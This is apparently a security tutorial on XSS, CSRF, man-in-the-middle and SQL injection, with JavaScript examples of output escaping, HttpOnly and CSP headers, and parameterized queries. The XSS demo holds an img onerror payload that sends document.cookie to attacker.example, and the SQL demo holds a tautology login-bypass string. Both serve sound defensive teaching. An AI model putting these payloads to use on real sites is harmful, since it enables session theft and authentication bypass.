This is the third day of my participation in the First Challenge 2022

XSS

XSS stands for Cross-Site Scripting. It is an attack in which the attacker injects a malicious script into a page's HTML or DOM so that the script runs in the browser of every user who views the page.

An injected script running in the victim's browser can typically do the following:

  1. Steal cookies, in particular the session cookie
  2. Monitor user behavior, for example capture the account name and password as they are typed and send them to the attacker's server
  3. Modify the DOM to forge a login form
  4. Inject pop-up advertisements into the page

XSS types

  • Stored: the malicious script is stored on the server, for example as a comment. Every user who later views that comment has the script executed in their browser.
  • Reflected: the attacker embeds the script in a URL. The server reads the malicious code from a request parameter, splices it into the HTML response and returns it; the browser parses the HTML and executes the script.
  • DOM-based: the attack script is carried in the URL and the user is induced to click it. Client-side JavaScript on the page reads the URL and writes it into the DOM unsafely, so the script runs. The key difference is that the malicious code never passes through the server.

How to prevent XSS

  • Input checking and output escaping: filter or escape tags such as script and iframe in input, and, more reliably, HTML-encode untrusted data at the point where it is written into the page, since tag blocklists are easy to bypass.
  • Set HttpOnly on cookies: many XSS payloads aim to steal the user's cookie in order to impersonate them. A cookie with the HttpOnly attribute cannot be read from JavaScript (document.cookie).
  • Enable CSP: Content Security Policy is delivered in the Content-Security-Policy HTTP response header. It stops resources that are not on the allow-list from loading or executing, including inline scripts unless they are explicitly permitted.
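The points above as runnable code. This is an added example, not code from the original article: a stored comment rendered with and without output encoding, plus the HttpOnly cookie and CSP response headers the prevention list refers to. The host name attacker.example and the session id are placeholders.

```javascript
// Added example (not code from the original article): a stored comment rendered
// with and without output encoding, plus the HttpOnly cookie and CSP response
// headers from the prevention list. attacker.example is a placeholder host.

// Escape the five characters that let text break out of an HTML text node or a
// quoted attribute value. Encoding at render time is the primary defence;
// filtering "<script>" on input alone is bypassable (event handlers, SVG, ...).
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, ch => HTML_ESCAPES[ch]);
}

// Vulnerable: the stored comment body is concatenated into the page verbatim,
// so whatever one user typed becomes markup for every reader (stored XSS).
function renderCommentUnsafe(author, body) {
  return `<div class="comment"><b>${author}</b>: ${body}</div>`;
}

// Hardened: the same template with every untrusted value encoded.
function renderCommentSafe(author, body) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Session cookie with HttpOnly: document.cookie no longer exposes it to an
// injected script. Secure and SameSite are set too because they belong together.
function sessionCookieHeader(sessionId) {
  return `Set-Cookie: session=${sessionId}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// A restrictive CSP: scripts only from this origin, no inline script or eval,
// no plugins, no <base> rewriting. An injected inline event handler is blocked
// because 'unsafe-inline' is absent from script-src.
function cspHeader() {
  return "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";
}

// Does the given tag survive as real markup in the rendered HTML?
function containsTag(html, tagName) {
  return new RegExp(`<${tagName}\\b`, 'i').test(html);
}

// Constructed attacker comment: it has no <script> tag, so a tag blocklist would
// miss it, yet its onerror handler ships the cookie to the attacker's host.
const XSS_PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

function demo() {
  return {
    unsafe: renderCommentUnsafe('mallory', XSS_PAYLOAD),
    safe: renderCommentSafe('mallory', XSS_PAYLOAD),
    cookie: sessionCookieHeader('abc123'),   // placeholder session id
    csp: cspHeader(),
  };
}
```

Run demo() and compare the two rendered strings: in the unsafe version the img tag is live markup and the handler fires in every reader's browser; in the safe version the same bytes are displayed as text. Even if the encoding were missed somewhere, the HttpOnly cookie keeps document.cookie empty for the exfiltration and the CSP blocks the inline handler, which is why the three measures are used together.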

CSRF

CSRF stands for Cross-Site Request Forgery. The attacker uses the user's logged-in identity to perform unauthorized operations in the user's name, without the user's knowledge.

How CSRF is triggered

  • A malicious URL embedded in an image: when the page containing the image loads, the browser automatically issues a GET request to that URL, with the user's cookies attached.
  • A form that submits itself as soon as the page is opened: this simulates the user completing a POST request, and the browser attaches the user's cookies, so the server mistakes it for a legitimate user action and the malicious operation goes through.
  • Inducing the user to click a link, which sends the request with the user's cookies attached.

Prevention strategies

In a CSRF attack the attacker can only make the browser send the victim's cookie along with a request in order to win the server's trust. The attacker cannot read the cookie's contents, and cannot read the server's response either, because the same-origin policy blocks both. Defenses therefore rely on a value the attacker cannot obtain, or on stopping the cookie from being sent.

  • Validate a token: the server issues a token when the browser requests the page; each subsequent request must carry both the token and the cookie before it is treated as legitimate.
  • Validate the Referer: check the Referer request header to verify the source site. The header can be missing or manipulated, so this is only a supplementary check.
  • Set SameSite on the cookie: the SameSite attribute stops the cookie from being sent with cross-site requests, but browser support varies.
  • Server adds the X-Frame-Options response header: this header defends against clickjacking attacks that nest the page in an iframe, by stopping the browser from rendering the page inside another site's frame.
  • Sensitive operations require extra steps, such as entering a captcha.

Man-in-the-middle attack

Concept

Man-in-the-middle attack (MITM attack): the attacker establishes a separate connection with each end of a communication and relays the data between them. Both ends believe they are talking to each other directly over a private connection, but in fact the whole conversation passes through, and is controlled by, the attacker, who can read the traffic and insert new content.

Summary: a request or response in transit is intercepted and tampered with by an attacker.

A man-in-the-middle attack exploits the lack of mutual authentication. Taking over the communication channel between the two participants is its core.

Most encryption protocols include authentication specifically to prevent man-in-the-middle attacks. For example, SSL/TLS lets each party verify that the other's certificate was issued by a trusted certificate authority, and it supports mutual (two-way) authentication.

Attack process

  1. The client sends a request to the server; the request passes through the intermediary, who intercepts it.
  2. The server sends its public key to the client.
  3. The intermediary intercepts the server's public key and keeps it, then sends their own forged public key to the client in its place.
  4. The client, believing the forged key belongs to the server, uses it to encrypt a session secret and sends the result to the server.
  5. The intermediary intercepts that message, decrypts it with their own private key to recover the real session secret, then encrypts a secret of their choosing with the server's genuine public key and forwards it.
  6. The server decrypts it with its private key and obtains the intermediary's secret. From then on the intermediary can decrypt, read and alter the data flowing in both directions before re-encrypting and forwarding it.

Attack types

  1. Wi-Fi spoofing: an attacker sets up a fake Wi-Fi access point with the same name as the local free Wi-Fi, or a plausible name such as "Guest Wi-Fi". Once a device connects to the malicious access point, the attacker can monitor and alter its online activity.

  2. HTTPS spoofing: the attacker tricks the browser into believing it is on a trusted site and redirects the traffic to a site they control. Any credentials entered there go to the attacker.

  3. SSL hijacking: when a user visits the plain HTTP version of a site, the server normally redirects them to the HTTPS version. An attacker who controls the channel can hijack that redirect, keep the user on an unencrypted connection to a server in the middle, and capture the data and credentials the user enters.

  4. DNS spoofing: the Domain Name System translates the human-readable names typed into the address bar into the IP addresses computers use. DNS spoofing feeds the browser a forged answer so that it connects to an address under the attacker's control.

  5. Email hijacking: if an attacker gains access to the mailbox of a trusted institution such as a bank, or to its mail server, they can intercept customer emails containing sensitive information and even send emails as the institution itself.

How to prevent man-in-the-middle attacks

  1. Use HTTPS: make sure every site you visit uses HTTPS, so that traffic is encrypted and the server's certificate is verified.
  2. Don't ignore the warnings: if the browser reports a problem with the site you are visiting, trust it. A certificate warning can be the difference between handing credentials to an attacker and staying secure.
  3. Avoid public Wi-Fi: sometimes it is unavoidable. If you must use it, connect through a VPN so the local network only sees encrypted tunnel traffic, and pay attention to browser security warnings; a sudden increase in certificate warnings can indicate a MITM attack.
  4. Run and update antivirus software: keep it up to date.

SQL injection: principle and prevention

Principle of SQL injection

SQL injection inserts SQL syntax into Web form fields, query strings or other request parameters so that the server is tricked into executing SQL the developer never intended. It exploits applications that build their SQL statements by concatenating untrusted input: the injected text changes the structure of the statement handed to the database engine, so the attacker can read or modify the database of a vulnerable site instead of running the query the designer intended.

How to prevent injection

  • Never trust user input. Validate it with regular expressions and length limits, and if a value must be placed inside a string literal, escape single quotes by doubling them ('' ) so they cannot terminate the literal.
  • Never build SQL by string concatenation. Use parameterized SQL (prepared statements), or stored procedures, for data access.
  • Never connect to the database with administrator privileges. Give each application its own account with the minimum rights it needs.
  • Do not store confidential information in plain text. Encrypt sensitive data and hash passwords.
  • Application error messages should reveal as little as possible. Wrap the original database error in a custom message for the user and record the full exception server-side, for example in a separate table.
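The first two points above, shown on one login query. This is an added example and not code from the original article: the query is built by concatenation, by concatenation with quote-doubling, and as a parameterized statement, and a small scanner of string literals shows whether the attacker's input stayed inside its literal or became SQL syntax. The table and column names and the placeholder style are assumptions for the demo.

```javascript
// Added example (not code from the original article): the same login query
// built three ways, plus a small literal scanner that shows whether user input
// stayed inside its string literal or broke out into SQL syntax. Table/column
// names and the $1/$2 placeholder style are demo assumptions.

// 1. Dynamically assembled SQL (vulnerable): input is pasted into the statement.
function buildUnsafe(username, password) {
  return "SELECT id FROM users WHERE name = '" + username +
         "' AND password_hash = '" + password + "'";
}

// 2. The legacy mitigation: double every single quote so it cannot terminate
// the literal. Only adequate for plain string literals; numbers, identifiers
// and LIKE patterns need their own handling, which is why 3. is preferred.
function escapeSqlLiteral(value) {
  return String(value).replace(/'/g, "''");
}
function buildEscaped(username, password) {
  return buildUnsafe(escapeSqlLiteral(username), escapeSqlLiteral(password));
}

// 3. Parameterized query: the statement text is fixed and the values travel
// separately, so the engine never parses them as SQL.
function buildParameterized(username, password) {
  return {
    text: 'SELECT id FROM users WHERE name = $1 AND password_hash = $2',
    values: [username, password],
  };
}

// Scanner: walk the statement, collect string literals ('' inside a literal is
// an escaped quote), keep the text outside literals, and stop at a -- comment,
// which swallows the rest of the line just as the database would.
function analyze(sql) {
  const literals = [];
  let outside = '';
  let comment = null;
  let i = 0;
  while (i < sql.length) {
    if (sql.startsWith('--', i)) { comment = sql.slice(i); break; }
    if (sql[i] !== "'") { outside += sql[i++]; continue; }
    let lit = '';
    i++;                                   // skip the opening quote
    for (;;) {
      if (i >= sql.length) return { literals, outside, comment, unterminated: true };
      if (sql[i] !== "'") { lit += sql[i++]; continue; }
      if (sql[i + 1] === "'") { lit += "'"; i += 2; continue; }   // doubled quote
      i++;                                 // closing quote
      break;
    }
    literals.push(lit);
  }
  return { literals, outside, comment, unterminated: false };
}

// Constructed attacker input: closes the name literal, adds a tautology and
// comments out the password check.
const ATTACK_INPUT = "admin' OR '1'='1' --";

function demo() {
  const unsafe = analyze(buildUnsafe(ATTACK_INPUT, 'x'));
  const escaped = analyze(buildEscaped(ATTACK_INPUT, 'x'));
  return {
    unsafeLiterals: unsafe.literals,     // input split into three literals
    unsafeOutside: unsafe.outside,       // now contains the attacker's OR
    unsafeComment: unsafe.comment,       // the password check, commented out
    escapedLiterals: escaped.literals,   // input stays one literal
    escapedOutside: escaped.outside,
    parameterized: buildParameterized(ATTACK_INPUT, 'x'),
  };
}
```

In the unsafe build the scanner finds three literals, an OR outside any literal and the whole password comparison inside a comment, which is exactly the structural change the principle section describes. With quote-doubling the entire input is a single literal, and with parameters the statement text never changes at all.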
